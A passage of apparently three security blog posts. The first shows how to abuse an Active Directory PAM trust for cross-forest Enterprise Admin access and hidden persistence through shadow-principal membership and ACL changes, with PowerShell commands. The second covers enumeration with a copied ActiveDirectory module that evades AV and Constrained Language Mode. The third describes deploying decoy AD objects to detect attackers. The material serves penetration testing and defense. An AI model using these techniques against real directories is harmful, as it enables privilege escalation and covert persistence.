Set-ADObject -Identity "CN=psforest-ShadowEnterpriseAdmin,CN=Shadow Principal Configuration,CN=Services,CN=Configuration,DC=bastion,DC=local" -Add @{'member'="CN=Administrator,CN=Users,DC=bastion,DC=local"} -Verbose
</textarea></pre>
Now, it is possible to manage powershell.local forest from bastion.local without making any changes in the group memberships or ACLs on powershell.local.<br />
<br />
This looks great! This takes away administrative overhead of managing groups and ACLs and reduces chances of lateral movement techniques like OverPTH, PTT and other credential relay techniques.<br />
<br />
Now, there is something worth noticing about the above setup. To be able to use the shadow security principals, we had to allow SIDHistory in the PAM trust which means no <a href="https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2003/cc755321(v=ws.10)#sid-filtering">SID Filtering</a>. We will see in the next section how this can be dangerous if not configured properly.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<h4>
The Misconfiguration</h4>
<h4>
</h4>
</div>
<div style="text-align: justify;">
Let's get back to the scenario I saw during the assessment. The client enabled PAM and they were using a forest in production (not a separate bastion or admin forest) to manage other forest(s). The forest used to manage other forests was located at their headquarters and their forests for their sites across the country were managed using it. An applause for them to have separate forests for different locations :)<br />
<br />
They were sold on the part that using PAM will protect the credential based attacks - no logon using credentials from the bastion forest to any other forest.<br />
<br />
But, a PAM trust where you do not have an isolated bastion forest is disastrous. Why? Because in such a case if we compromise the bastion forest we get high privileges (Enterprise Admins or Domain Admins) in the other forest. And:<br />
- There is no group membership (unlike Foreign Security Principals)<br />
- No ACLs modification<br />
- AFAIK, no other modification to look for in the forest which gets compromised!<br />
<br />
Let's have a look at an example. Following is the setup in my lab (diagram built using draw.io):<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj27jSOEr8tKHCVpp1bNkJ4I35mXqAUJJRRlodK4nBisYU1VzFkRSf6M1kipT2Qhjf32-CGPTY4iTKSFRSBCB0fG3OMkza3jyS-BlZy_fi7DWCrExYEkOzs-rWbKAOhg2Jjpn9dbyhDH2I/s1600/PAM+%25281%2529.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="184" data-original-width="779" height="127" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj27jSOEr8tKHCVpp1bNkJ4I35mXqAUJJRRlodK4nBisYU1VzFkRSf6M1kipT2Qhjf32-CGPTY4iTKSFRSBCB0fG3OMkza3jyS-BlZy_fi7DWCrExYEkOzs-rWbKAOhg2Jjpn9dbyhDH2I/s640/PAM+%25281%2529.png" width="550" /></a></div>
defensiveps.local is the bastion forest and powershell.local is the user/production forest.<br />
<br />
<h4>
Abusing the PAM trust</h4>
<br />
Here is how to identify and approach abusing a PAM trust:<br />
<br />
<b>Enumeration</b><br />
<br />
First, let's enumerate if our current forest has any PAM trust with any other forest, that is, if our current forest can access any other forest without worrying about SID Filtering.<br />
<br />
Using the <a href="https://github.com/samratashok/ADModule">ADModule</a>, we can simply run Get-ADTrust and look for a trust which has ForestTransitive set to True and SIDFilteringQuarantined set to False - this means that SID Filtering is disabled.<br />
<pre><textarea cols="70" readonly="readonly" rows="1" style="background-color: #012456; color: white;">Get-ADTrust -Filter {(ForestTransitive -eq $True) -and (SIDFilteringQuarantined -eq $False)}
</textarea></pre>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj7KJR65vR6_rke_sVn2rGrao9u0-NFWDpAJlWzgCaQALdIoT2e_JHJy64-oUdcQumOuOF5bxw59E7wCcssoW03dJ5YH4XCHXvlLNhKZv3W9Q0qKHyxRzJFGcwPLvlwFpVEz5FBBusTlok/s1600/Enumerate_PAM_AD.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="824" data-original-width="1600" height="205" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj7KJR65vR6_rke_sVn2rGrao9u0-NFWDpAJlWzgCaQALdIoT2e_JHJy64-oUdcQumOuOF5bxw59E7wCcssoW03dJ5YH4XCHXvlLNhKZv3W9Q0qKHyxRzJFGcwPLvlwFpVEz5FBBusTlok/s400/Enumerate_PAM_AD.png" width="400" /></a></div>
<br />
Powerview (dev branch), calculates the TrustAttributes for you but does not tell you if SID Filtering is enabled when used from the user/production forest.<br />
<br />
On the other hand, if you want to enumerate if your current forest is managed by a bastion forest (Blue Teams take note), look for ForestTransitive set to True and SIDFilteringForestAware set to True. In this case, <a href="https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-adts/e9a2d23c-c31e-4a6f-88a0-6646fdb51a3c">TrustAttributes</a> is also a very good indicator. It is 0x00000400 (1024 in decimal) for PAM/PIM trust. Simplifying it, it is 1096 for PAM + External Trust + Forest Transitive.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEitdM8nTXT7_t6t4oD5gFToSFvrIb2XbuBF7nhMy9yMapilJFnZYHab14UqD4g2w-uZ2Ls4EB5Cn-B_ZTwWoSydM3yN9LJJR9xsqA8hifYDR4u61dXk6IdtLAPvpRXximVirCO1_fsfFhI/s1600/Enumerate_PAM_Production_AD.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="491" data-original-width="1310" height="148" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEitdM8nTXT7_t6t4oD5gFToSFvrIb2XbuBF7nhMy9yMapilJFnZYHab14UqD4g2w-uZ2Ls4EB5Cn-B_ZTwWoSydM3yN9LJJR9xsqA8hifYDR4u61dXk6IdtLAPvpRXximVirCO1_fsfFhI/s400/Enumerate_PAM_Production_AD.png" width="400" /></a></div>
In this case (when rum from the bastion forest), PowerView (dev) tells if PIM Trust is enabled. <br />
<br />
Next, let's enumerate the shadow security principals, its members from the current (bastion) forest and privileges in the user/production forest. We can use the following command from the ActiveDirectory module:</div>
<pre><textarea cols="70" readonly="readonly" rows="3" style="background-color: #012456; color: white;">Get-ADObject -SearchBase ("CN=Shadow Principal Configuration,CN=Services," + (Get-ADRootDSE).configurationNamingContext) -Filter * -Properties * | select Name,member,msDS-ShadowPrincipalSid | fl
</textarea></pre>
<div style="text-align: justify;">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiYg_PRj7fCXzzruYhcCEf0cEo8Qg37G1pq2x2K0lpL0fFvP8DuG5r_fokdE-7MEA_A-mCR1mgBBy_ZVh1kxdkLobDwYv5PiOvseNLbkVU3fFDr8YMLOvIdDZ8gcdBAcSIt1V9N5hSsTOU/s1600/Enumerate_SSP_Privs.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="416" data-original-width="1600" height="103" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiYg_PRj7fCXzzruYhcCEf0cEo8Qg37G1pq2x2K0lpL0fFvP8DuG5r_fokdE-7MEA_A-mCR1mgBBy_ZVh1kxdkLobDwYv5PiOvseNLbkVU3fFDr8YMLOvIdDZ8gcdBAcSIt1V9N5hSsTOU/s400/Enumerate_SSP_Privs.png" width="400" /></a></div>
As clear in the above screenshot, we can look for Shadow securtiy principals in the special container 'CN=Shadow Principal Configuration,CN=Services' under the Configuration container on bastion forest. Following properties are the most interesting ones:<br />
<br />
- <b>Name</b> - Name of the shadow principal<br />
<br />
- <b>member</b> - Members from the bastion forest which are mapped to the shadow principal. In our example, it is the Domain Administrator of defensiveps.local.<br />
<br />
- <b>msDS-ShadowPrincipalSid</b> - The SID of the principal (user or group) in the user/prodcution forest whose privileges are assgined to the shadow security principal. In our example, it is the Enterpise Admins group in the user forest.<br />
<br />
<b>Using the shadow principals </b><br />
<br />
Now, if we compromise the user listed in "member" above we can use the shadow principals. In our example, we need to compromise the Administrator user fo defensiveps.local forest and then we will have enterpirse admins privileges on powershell.local forest!<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj9lrnnkQXiXOQEpKf_ED3KJikQ1d7ae8t_i9L3L7PS9aPhI1VUf2-_YZ2bSZHv4qXnOxZfzMQq6UGYo_ejL65asWjPCqOn9m3FsBM86v7xpkmyBaYiW1b4Bid73WGBT4G2SQGCKPSxrOI/s1600/EA_PS.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="425" data-original-width="826" height="205" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj9lrnnkQXiXOQEpKf_ED3KJikQ1d7ae8t_i9L3L7PS9aPhI1VUf2-_YZ2bSZHv4qXnOxZfzMQq6UGYo_ejL65asWjPCqOn9m3FsBM86v7xpkmyBaYiW1b4Bid73WGBT4G2SQGCKPSxrOI/s400/EA_PS.png" width="400" /></a></div>
This is very interesting! We crossed the forest security boundary with ease :) Remember that we need not have group membership or ACL on the user forest.<br />
<br />
With the privileges achieved using shadow principals above, we can access the user forest using RDP (explicit credentials of the bastion user required), WMI, PowerShell Remoting etc. Please note that if Kerberos AES Encryption is not enabled for the PAM trust, we need to add the machines of existing forest in WSMan TrustedHosts and use '-Authentication Negotiate' option with PowerShell remoting cmdlets.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEin6jmo9P4NKY7g6N6rej6vRa388THkRwrdpKxb5iY_XWlLR2AnteGc8N5AMQHMuainLPXfse0Z6-OOqK_icLrbkyflT135hc53Io6UeUV1rb9f5hTFSaSWHvr2C0JBs-H1glVGQ1YZPUU/s1600/PS-DC.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="755" data-original-width="1286" height="233" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEin6jmo9P4NKY7g6N6rej6vRa388THkRwrdpKxb5iY_XWlLR2AnteGc8N5AMQHMuainLPXfse0Z6-OOqK_icLrbkyflT135hc53Io6UeUV1rb9f5hTFSaSWHvr2C0JBs-H1glVGQ1YZPUU/s400/PS-DC.png" width="400" /></a></div>
UPDATE (23/04/2019): Please note that we can also use SIDHistory injection using mimikatz to abuse the PAM trust. I left it out because using a shadow principal looks more normal in the user forest then SIDHistory injection. But, since <a href="https://twitter.com/dottor_morte">Riccardo</a> pointed out that it will still be useful, please take a note of it!<br />
<br />
<b>Persistence</b><br />
<br />
We can also use this for persistence. Please note that the persistence will be for the privileges on the user/prodcution forest and not the bastion forest itself. <b> </b><br />
<br />
Once we have compromised the bastion forest, there are multiple ways we can use:<br />
<br />
1. We can add a user to an existing shadow security principal container.<br />
<pre><textarea cols="70" readonly="readonly" rows="3" style="background-color: #012456; color: white;">Set-ADObject -Identity "CN=psforest-ShadowEnterpriseAdmin,CN=Shadow Principal Configuration,CN=Services,CN=Configuration,DC=defensiveps,DC=local" -Add @{'member'="CN=lowpriv user,CN=Users,DC=defensiveps,DC=local"} -Verbose
</textarea></pre>
<br />
Please note that in this case, if someone looks at the details of the 'lowprivuser', he/she would appear to be a part of the psforest-ShadowEnterpriseAdmin 'group'. <br />
<br />
2. Better, we can modify the ACL of the shadow principal object. We can provide a user we control, Full Permission overt shadow principal object but the fun is always with <a href="https://www.labofapenetrationtester.com/2018/04/dcshadow.html">minimal permissions</a>. So, with only Read Members and Write Members permissions on the shadow principal object, we can add and remove princiapls at will from the shadow principals. Take a look at the below screenshot:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhc9Xd2VZxje5kVUS04KbjNo2sp8TWYwqQagcBOgmPYlJPEUCdyalrg0MrPk98R0rsv1jl7Ske0UG720Uo_ahflTxLLZgzT4iWlZnL9acqMPFSmvtXfaIb8HV81XH2RePG_tDbhEYjiGOY/s1600/ACL_Persistence.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="768" data-original-width="1600" height="191" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhc9Xd2VZxje5kVUS04KbjNo2sp8TWYwqQagcBOgmPYlJPEUCdyalrg0MrPk98R0rsv1jl7Ske0UG720Uo_ahflTxLLZgzT4iWlZnL9acqMPFSmvtXfaIb8HV81XH2RePG_tDbhEYjiGOY/s400/ACL_Persistence.png" width="400" /></a></div>
<br />
Now, we can add or remove users at will with the privileges of 'reportdbadmin' user. On top of that, by-default there are no logs for any changes to the ACL or 'membership' of a shadow principal :)<br />
<br />
<h4>
Is PAM trust bad? Should I stop using a bastion forest? Why is Microsoft so evil? What is the meaning of life?</h4>
<h4>
<br />
</h4>
PAM trust is not bad, IF used wisely! You can use a bastion forest with PAM trust but please be careful. Learn from the setup we discussed just now. Do not use a regular forest (with users doing non-admin activities) as bastion forest. As Willem pointed out in his article, when you use the PAM trust you extended the security boundary of the user forest to include the bastion forest. Treat the bastion forest as a special case and you will be fine. <br />
<br />
UPDATE: I forgot to link this: <a href="acchttps://docs.microsoft.com/en-us/microsoft-identity-manager/pam/privileged-identity-management-for-active-directory-domain-services">Microsoft provides guidance on providing access to the bastion forest using Microsoft Identity Management (MIM). </a><br />
<h4>
Detection</h4>
</div>
<div style="text-align: justify;">
</div>
On the bastion host, as we already discussed, there are no logs by-default for modification of membership or ACL of shadow principals. <br />
<br />
On the existing/production forest, the detection seems pretty easy. There will always be the Special Logon (4672), Logon (4624) and Logoff (4634) events when anyone uses principal from the bastion forest to access the existing forest. But the problem here is to detect an anomaly as the same logs will be there for actual operations as well. Unless, an adversary is using a new user or doing something very noisy, it may be difficult to detect her with only these entries. <br />
<br />
I hope this post enocurages everyone to have another look at their forest trusts. As always, please leave feedback :)<br />
<br /></div>
Nikhil SamratAshok Mittalhttp://www.blogger.com/profile/02092541175521734123noreply@blogger.com0tag:blogger.com,1999:blog-8135211063584500909.post-74014949772204983002018-10-31T22:40:00.002+05:302018-11-16T19:56:55.053+05:30Using ActiveDirectory module for Domain Enumeration from PowerShell Constrained Language Mode<div dir="ltr" style="text-align: left;" trbidi="on">
This is a quick post to make notes of something which I have been using and teaching for sometime.<br />
<br />
We can use Micorosft's PowerShell ActiveDirectory module without RSAT and administrative privileges. I came to know about this from <a href="https://janikvonrotz.ch/2015/09/09/deploy-powershell-activedirectory-module-without-installing-the-remote-server-tools/">this blog post</a>.<br />
<br />
So, if you have access to a Server which has the module installed (like a DC), copy the Microsoft.ActiveDirectory.Management.dll from C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.ActiveDirectory.Management to your own machine and then use the Import-Module cmdlet to import the DLL:<br />
<pre><textarea cols="70" readonly="readonly" rows="2" style="background-color: #012456; color: white;">PS C:\> Import-Module C:\ADModule\Microsoft.ActiveDirectory.Management.dll -Verbose
</textarea></pre>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjlw8zH5s83_BHIVMQhyniImVyFIZOXMBYb9EnJiFw6UZOvPD0jUCdKzJm4I2-dnYeRipYRGfPcYJIS_W8syMogEpU1H42AD7AhFO2XIvDsJ99RAy7M9vrh0G3AisqIYM1J05coAzQrYrs/s1600/AD_Module.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="668" data-original-width="1600" height="166" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjlw8zH5s83_BHIVMQhyniImVyFIZOXMBYb9EnJiFw6UZOvPD0jUCdKzJm4I2-dnYeRipYRGfPcYJIS_W8syMogEpU1H42AD7AhFO2XIvDsJ99RAy7M9vrh0G3AisqIYM1J05coAzQrYrs/s400/AD_Module.png" width="400" /></a></div>
Please note that if you run Get-Command -Module ActiveDirectory, it would not return anything. To get that, copy the module directory as well from the server from following location: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\ActiveDirectory\. Then, use Import-Module, first the DLL and then the module:<br />
<pre><textarea cols="70" readonly="readonly" rows="4" style="background-color: #012456; color: white;">PS C:\> Import-Module C:\ADModule\Microsoft.ActiveDirectory.Management.dll -Verbose
PS C:\> Import-Module C:\AD\Tools\ADModule\ActiveDirectory\ActiveDirectory.psd1
PS C:\> Get-Command -Module ActiveDirectory
</textarea></pre>
UPDATE (16-Nov-2018) - It is now possible to load the module from memory by using Import-ActiveDirectory.ps1. Thanks to a PR by @D1iv3: <br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjiCWcvpe0EXPpdJJWixiLbxX5brKF5KT_n0DyxKF33njpL9o4cjQFN-dMMDmYDIlgiA_mTRxaA5qH2t2BDjUt6LUfmi9zhJaVRMH2PzYjRTwzpnhf9QDtEl2d4Dl7lkKafu7zhyoygK8U/s1600/AD_Module_Array.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="776" data-original-width="1600" height="193" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjiCWcvpe0EXPpdJJWixiLbxX5brKF5KT_n0DyxKF33njpL9o4cjQFN-dMMDmYDIlgiA_mTRxaA5qH2t2BDjUt6LUfmi9zhJaVRMH2PzYjRTwzpnhf9QDtEl2d4Dl7lkKafu7zhyoygK8U/s400/AD_Module_Array.png" width="400" /></a></div>
There are many benefits like very low chances of detection by AV, very wide coverage by cmdlets (I leave the usage of cmdlets for a later post :P), good filters for cmdlets, signed by Microsoft etc.<br />
<br />
I have uploaded a copy of module from Server 2016 on Github: <a href="https://github.com/samratashok/ADModule">https://github.com/samratashok/ADModule</a><br />
<br />
The biggest benefit is that this module works flawlessly in PowerShell Constrained Language Mode (CLM) :)<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgRUzpUxMmD-jlvxS9h99fyDBIfADPN2UCUaOT0Vng6PL5jU7FDKrgp1WGn5177DZ2gKmZEko_ITgvRmZlIINdeTYyy4AFJEhSW7kuxhunJrb7RhAaEtmrHbCxna5P1alD4-SgZu8nyO2E/s1600/AD_Module_CLM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="438" data-original-width="1600" height="108" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgRUzpUxMmD-jlvxS9h99fyDBIfADPN2UCUaOT0Vng6PL5jU7FDKrgp1WGn5177DZ2gKmZEko_ITgvRmZlIINdeTYyy4AFJEhSW7kuxhunJrb7RhAaEtmrHbCxna5P1alD4-SgZu8nyO2E/s400/AD_Module_CLM.png" width="400" /></a></div>
That is all!</div>
Nikhil SamratAshok Mittalhttp://www.blogger.com/profile/02092541175521734123noreply@blogger.com0tag:blogger.com,1999:blog-8135211063584500909.post-84081333898045955462018-10-16T23:13:00.000+05:302018-10-16T23:13:51.107+05:30Forging Trusts for Deception in Active Directory<div dir="ltr" style="text-align: left;" trbidi="on"><div style="text-align: justify;"></div><div style="text-align: justify;">Deception has always been of interest to me. As a student of military history, I have always been fascinated by its implementation in warfare and looked at deception as something which is effective and generally low cost!</div><div style="text-align: justify;">Couple of years back, I got involved in development and extensive testing (from red team perspective) of couple of enterprise deception solutions over a period of many months. In early 2018, during one of my Active Directory classes, a student asked and ultimately hired me (thank you!) for testing three Deception products they were evaluating. </div><div style="text-align: justify;"><br />
</div><div style="text-align: justify;">With these experiences I realized that most of the focus for deception in Active Directory (AD) has been on honeyuser/honeytokens/honeycredentials. Tools like <a href="https://github.com/secureworks/dcept">dcept</a> and others are popular for this technique. There is a dearth of free and open source deception solutions for AD if we want to utilize deception to detect an adversary during the domain enumeration phase of an attack. That is something which we are going to address soon.<br />
<br />
Also, to increase interest and community involvement, I gave a talk on 'Forging Trusts for Deception in Active Directory' at <a href="https://sched.co/FXIf">BruCON</a> couple of weeks back (October 2018). Slides and video are at the end of this post. </div><div style="text-align: justify;"></div><br />
<h4 style="text-align: justify;">What is Deception?</h4><br />
<div style="text-align: justify;">Deception is a psychology game. Red teams and adversaries have been using it for so long against unsuspecting users to trick them in opening malicious attachments or clicking on links. Once inside an AD environment, an adversary tries to use credentials of other users and pivot through other machines to mix with the existing logs and traffic.<br />
<br />
Blue teams utilize deception by providing service, privileges or information can adversary is looking for. IMHO, blue teams, have an upper hand when it comes to deception, both in terms of psychology and technical controls.<br />
<br />
<h4>The attacker psychology </h4>There is a psychological condition called <a href="https://en.wikipedia.org/wiki/Illusory_superiority">Illusive Superiority</a> which applies to most of the adversaries and red teams. They think of themselves as smarter and much more talented than the blue teams. Along with this, the tendency to go for the "lowest hanging fruit" and an urge for getting DA privileges quickly, makes them a fruitful target for deception :)<br />
<br />
So, the idea is, defenders show the adversaries what they want to see. For example, a user whose password never expires or a Server 2003 computer.<br />
<br />
<h4></h4><h4>Desired properties of a decoy</h4><h4></h4>Taken directly from my slides, desired properties of a decoy:<br />
<ol><li>Should be desirable enough so that an attacker enumerates the object.</li>
<li>Should be easily configurable.</li>
<li>No configuration changes required on endpoints.</li>
<li>Should not be triggered for normal admin activity. </li>
</ol>Number 4 above is the hardest to achieve. If we are targeting enumeration, we must make the attacker activity or tools stand-out to avoid false positives.<br />
<br />
<h4></h4><h4>Deploying Deception</h4>So, how can we achieve above desired properties with just the built-in tools in AD? We can use Group Policy to set AD Access logging, configure 'interesting' objects and filter out false positives!<br />
<br />
The Group Policy setting required for AD Access is Windows Settings | Security Settings | Advanced Audit Policy Configuration | DS Access - Audit Directory Service Access <br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjmm-lRbRq6OsM46ZjBgihre7Fs6zbsJWSrHtS-Eeln4SAM1ncSg0VvHdaclrySKZyvBMUTbkt7I_dPMFENPyi-Tz9MPxmAb6AFrAaVmUsXsX9t1YAkaUTdGrYx53TCRNkS4ZHJUKFM308/s1600/DS_Access_GP.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="AD Access Group Policy" border="0" data-original-height="631" data-original-width="840" height="300" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjmm-lRbRq6OsM46ZjBgihre7Fs6zbsJWSrHtS-Eeln4SAM1ncSg0VvHdaclrySKZyvBMUTbkt7I_dPMFENPyi-Tz9MPxmAb6AFrAaVmUsXsX9t1YAkaUTdGrYx53TCRNkS4ZHJUKFM308/s400/DS_Access_GP.png" title="AD Access Group Policy" width="400" /></a></div>Above setting results in a Security Event 4662 whenever an AD object is accessed. The logging needs to configured at the object level. For that configuration, we need to modify the SACL of the object and add relevant ACEs.<br />
<br />
Let's have a look at the <a href="https://docs.microsoft.com/en-us/windows/desktop/api/securitybaseapi/nf-securitybaseapi-addauditaccessobjectace">AddAuditAccessObjectAce</a> function to understand ACE:<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjDaiLE2ZeUWZpxakHuCT06yF2KvdeKJvR23nuq5ejSQhx_l0HIOq-8oMF6gPHktC3r48bm5C4tQ65rPAk2VuxIfVi63lYLyBq8sNA1P6pLcDNqE-VaKwqSrS5KYGrXYnKctaqreoiThLo/s1600/ACE.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="583" data-original-width="1569" height="235" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjDaiLE2ZeUWZpxakHuCT06yF2KvdeKJvR23nuq5ejSQhx_l0HIOq-8oMF6gPHktC3r48bm5C4tQ65rPAk2VuxIfVi63lYLyBq8sNA1P6pLcDNqE-VaKwqSrS5KYGrXYnKctaqreoiThLo/s640/ACE.png" width="540" /></a></div><div class="separator" style="clear: both; text-align: center;"></div><div class="separator" style="clear: both; text-align: center;"></div>So, as an example, we can set auditing whenever 'everyone' uses 'ReadProperty' 'success'-fully against a user. This helps in detecting any enumeration against that user.<br />
<br />
<h4>Introducing Deploy-Deception </h4>These settings can be done using GUI. But thanks to PowerShell and the ActiveDirectory module, it can be automated.<br />
<br />
To automate the setting up of decoy object with interesting attributes and lesser known properties to avoid false positives , I wrote <b>Deploy-Deception</b>. It is a PowerShell module which utilizes the ActiveDirectory module to deploy decoys easily and efficiently. You can find Deploy-Deception on Github here: <a href="https://github.com/samratashok/Deploy-Deception">https://github.com/samratashok/Deploy-Deception</a><br />
<br />
<br />
Let's have a look at setting up of different types of object decoys during different phases of an attack.<br />
<br />
<h4>Enumeration - Decoy User Objects</h4>User objects are the most interesting objects Some user properties are of interest for an attacker:<br />
<ul><li>Password does not expire</li>
<li>Trusted for Delegation </li>
<li>Users with SPN</li>
<li>Password in description</li>
<li>Users who are members of high privilege groups</li>
<li>Users with ACL rights over other users, groups or containers </li>
</ul>We can use Deplou-UserDeception function to create a decoy user. <br />
Let's create a decoy user 'usermanager' whose password never expires and a 4662 is logged whenever everyone reads any of its properties:<br />
<pre><textarea cols="70" readonly="readonly" rows="3" style="background-color: #012456; color: white;">PS C:\> Import-Module C:\Deploy-Deception\Deploy-Deception.psd1
PS C:\> Create-DecoyUser -UserFirstName user -UserLastName manager -Password Pass@123 | Deploy-UserDeception -UserFlag PasswordNeverExpires -Verbose
</textarea></pre><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh8fzK1_L9a5Lm7Ew10a5z7y7lcE0PT3WOKe-Nbo5W6wglxsvYh95su_OQBXF7siYKW0RFeF312Zzbk4qqgYkSys-D2ku2XqV8k_2Xiddq_QBkd7hrmIdOTBkKGOVshD8vpt64vGTYjUBg/s1600/user_readall.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="382" data-original-width="1600" height="95" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh8fzK1_L9a5Lm7Ew10a5z7y7lcE0PT3WOKe-Nbo5W6wglxsvYh95su_OQBXF7siYKW0RFeF312Zzbk4qqgYkSys-D2ku2XqV8k_2Xiddq_QBkd7hrmIdOTBkKGOVshD8vpt64vGTYjUBg/s400/user_readall.png" width="400" /></a></div><br />
Please note that an actual user objects is created in the domain. Now, the above gets triggered very frequently as we have enabled the default logging for whenever anyone reads any property of the user usermanager. It means a 4662 will be logged even if someone simply lists all the users in the domain. This means, that this decoy will trigger logging for all the possible usage (normal or otherwise) like<br />
<br />
net user /domain<br />
<br />
Get-WmiObject -Class Win32_UserAccount<br />
<br />
Get-ADUser -Filter * (MS ActiveDirectory module)<br />
<br />
Get-NetUser (PowerView)<br />
<br />
Find Users, Contacts and Groups GUI <br />
<br />
That does not look good, right? So we need to find ways to differentiate attacker enumeration from normal activity. There is something very interesting with attacker enumeration tools, they like to extract as much information for an object as possible (which makes sense as you would not like to connect repeatedly to a domain controller). Now, this means that if we turn on auditing for an uncommon attribute, there is a large possibility (yes, possibility - share your false positives with me please :P) that only aggressive enumeration triggers the logging. There are many such attributes, have a look at the <a href="https://docs.microsoft.com/en-us/windows/desktop/adschema/attributes-all">List of All Attributes.</a> I liked once such attribute - <a href="https://docs.microsoft.com/en-us/windows/desktop/adschema/a-x500uniqueidentifier">x500uniqueIdentifier</a> (GUID d07da11f-8a3d-42b6-b0aa-76c962be719a)<br />
<br />
So, we now remove the ACE we added previously and add a new one which triggers logging only when x500uniqueIdentifier property is read:<br />
<pre><textarea cols="70" readonly="readonly" rows="4" style="background-color: #012456; color: white;">PS C:\> Deploy-UserDeception -DecoySamAccountName usermanager -RemoveAuditing $true -Verbose
PS C:\> Deploy-UserDeception -DecoySamAccountName usermanager -UserFlag PasswordNeverExpires -GUID d07da11f-8a3d-42b6-b0aa-76c962be719a -Verbose
</textarea></pre>This auditing is triggered only by tools like PowerView (or other tools like ADExplorer) which fetches all the attributes of an object. While not perfect, this is a huge improvement. <br />
<br />
If you have enough confidence that none of your monitoring or management tools read all the properties of a user object, auditing for properties like SPN can also be set which triggers logging only when SPN (or all attributes) is read. <br />
<pre><textarea cols="70" readonly="readonly" rows="2" style="background-color: #012456; color: white;">PS C:\> Create-DecoyUser -UserFirstName user -UserLastName manager-spn -Password Pass@123 | Deploy-UserDeception -SPN 'MSSQLSvc/dc' -GUID f3a64788-5306-11d1-a9c5-0000f80367c1 -Verbose
</textarea></pre>Still too many logs? The below command logs a 4662 log only when DACL (or all attributes) of the decoy user object is read:<br />
<pre><textarea cols="70" readonly="readonly" rows="2" style="background-color: #012456; color: white;">PS C:\> Create-DecoyUser -UserFirstName user -UserLastName manager-control -Password Pass@123 | Deploy-UserDeception -UserFlag AllowReversiblePasswordEncryption -Right ReadControl -Verbose
</textarea></pre><h4>Enumeration - Decoy Computer Objects</h4>We can also set decoy computer objects. It is possible to create computer objects in domain without having an actual computer mapped to that object. Although, it is always advised to use actual computers or VM for decoy computer objects to avoid identification of decoys.<br />
<br />
Some computer object properties which are of interest to an adversary:<br />
<ul><li>Older Operating Systems</li>
<li>Interesting SPN</li>
<li>Delegation Settings</li>
<li>Membership of privileged groups</li>
</ul>Let's have a look at some deployment using Deploy-Deception, we can use Deploy-DecoyComputer function. :<br />
<pre><textarea cols="70" readonly="readonly" rows="2" style="background-color: #012456; color: white;">PS C:\> Create-DecoyComputer -ComputerName revert-web -Verbose | Deploy-ComputerDeception -PropertyFlag TrustedForDelegation -GUID d07da11f-8a3d-42b6-b0aa-76c962be719a -Verbose
</textarea></pre>Above command creates a decoy computer that has Unconstrained Delegation enabled and a 4662 is logged whenever x500uniqueIdentifier or all the attributes of the computer are read.<br />
